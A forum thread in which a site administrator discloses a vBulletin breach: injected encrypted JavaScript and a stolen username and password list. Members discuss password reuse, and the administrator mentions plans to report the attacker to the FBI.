All users please read this immediately!

[Tim]

Hello everybody!

I'm a big fan of total disclosure, and because of this, I'm disclosing an incident that happened a couple days ago which affects all users.

Due to an major flaw in one of the forum components that these vBulletin forums use, this website was hit with an automated hacking bot that is just now starting to "penetrate" the internet in a very wide and massive way. The automated hack bot, using 2 major flaws in this forum software, was partially successful in its goal.

Basically this is what happened:

About 5 days ago I noticed some very odd activity on the forums. There was some weird javascript code being inserted into the forum header. I found the JS code and after a few seconds I learned it was encrypted.

Googling found no initial results, so I went to work on the JS. I learned it opened up a IFRAME to a specific URL, which, at the time, didn't appear to do anything.

I enlisted the help of Muffinman, who knows quite a bit more about JS than me, and he confirmed that the encrypted JS indeeded opened up a IFrame call to a PHP file on some rogue server. I removed all that bad stuff, only to find it re-appear the next day. Also, a quick google search showed that a lot of sites were now reporting being attacked, just like ours was.

At that point, I did some deep peering into the forum server and found some really bad stuff. With Muffins help, we located arbitrary code which gave the automated hack bot the full username/password list of every account on our website.

After about 8 hours I figured out the exact method and process, and was able to duplicate the exact hack that was used. I then went to the software companies that make the commercial software we use, and spoke directly with the owner, duplicated the issue, and was given a patch. After doing further digging, this hack is moving through the forum world like wildfire right now and we were indeed very lucky to catch it right away.

I've since applied the fix to this bug, cleaned everything up, and have now implemented a requirement that everybody change their forum password ASAP.

If you have not already been prompted to, please change your forum password ASAP.

So in the interest of full disclosure:

The hack used was a vBulletin SEO hack (patched)

The hack was identified as an automated bot due to its repeated failed attempts at injecting encrypted Javascript into our custom forum design.

The hack used varied IP addresses in these blocks
87.118.
195.66.
93.183.

The hack was able to download only a specific mysql query, which was to list 2 items: username, password of all users.

Common Questions:

Is your PC Safe? This hack only affected the forums, and only grabbed your username/password to the forum itself, and did not affect anything that you would download and infect your PC with.

Does this affect Pwnboxer? Nope, Pwnboxer is on its own server, completely unrelated to this, done so for this very security reason.

Does this affect my WoW account? Nope, not in any fashion.

So how exactly does this affect me? Your user/pass could be used to log into the forum account, post as you, spam users, etc.

Could the hack bot do anything else? No, The bug in the forum software was fixed, and I manually banned 196,000 IP addresses that the hack bot could potentially come from.

While this may not seem like a big deal, since it only affects your forum account, I still believe that you deserve to know what happened.

Let me know if you have any questions!!!

[TheMuffinMan]

I worked almost all day that day on this with Tim. I can confirm everything he has said here. In my almost 10 years of professional computer experience, I have never seen such a bugger of a hack as this one, it was absolutely the hardest thing I have ever helped track down.

As Tim said, the only thing it grabbed was the username/password combos from THIS FORUM. It did not touch anything on your PC at all. While the passwords on these forums are encrypted, Tim is having everyone change your passwords just to be safe.

I will help Tim answer any questions you guys have!

LATERZ!

[Ualaa]

A good reason to not use the same username/password combo on more then one site, particularly if you care about whatever is being protected.

I'd guess this would be some gold selling company, that wanted access to our actual wow accounts. Not really sure on that, but that would be my guess.

[Tim]

Quote:

Originally Posted by Ualaa

I'd guess this would be some gold selling company, that wanted access to our actual wow accounts. Not really sure on that, but that would be my guess.

This is NOT TRUE. I want to chime in real quick and debunk any concept of that right away.

It was simply an automated attack, which happens all the time. In the realm of speaking, most servers on the internet have attacks launched against them at a rate of 5000+ per day, every day, 24/7. It is just the way things are.

So to repeat, this was NOT a gold farmer or anything targeted toward WoW, simply just an automated bot attack.

[TheMuffinMan]

Quote:

Originally Posted by Tim

This is NOT TRUE. I want to chime in real quick and debunk any concept of that right away.

It was simply an automated attack, which happens all the time. In the realm of speaking, most servers on the internet have attacks launched against them at a rate of 5000+ per day, every day, 24/7. It is just the way things are.

So to repeat, this was NOT a gold farmer or anything targeted toward WoW, simply just an automated bot attack.

Correct...

When googling the bits of Javascript that affected this site, I found everything from PS3 forums to forums on how to make a delicious roast that had all been infected.

[ebony]

i know it! i came on and saw the mySQL Bugged code

wont me to make there life hell???

[ebony]

(Tim snipped a bit here, your comments ebony are good comments, but they might be construed in a scary way, but I do agree with what you said. Interesting underground world going on )

SO here the end off the story DO NOT USE THE SAME EMAIL/PASSWORD AS ANYOTHER SITE ON THE INERNET IF YOU NOT GOT A FEYFOD or app! i have a email that is for banks/wow/paypal/ebay (anythink that costs me RL money) and do not use it anywhere.

[Tim]

Folks I have a fun update. I've been working on tracking down the specific individual responsible for this, and in a breaking case, I now have in my property the name, home address, phone number, parents information, etc., of the specific individual who launched the attack against our website.

I am assembling the information together in a presentable and conclusive case and will be visiting the FBI local office in Minnesota and opening up a case.

Any interest by you guys in staying afloat of the whole situation?

[GatorKram]

Sure.

[Paul1337noob]

great news,well done tim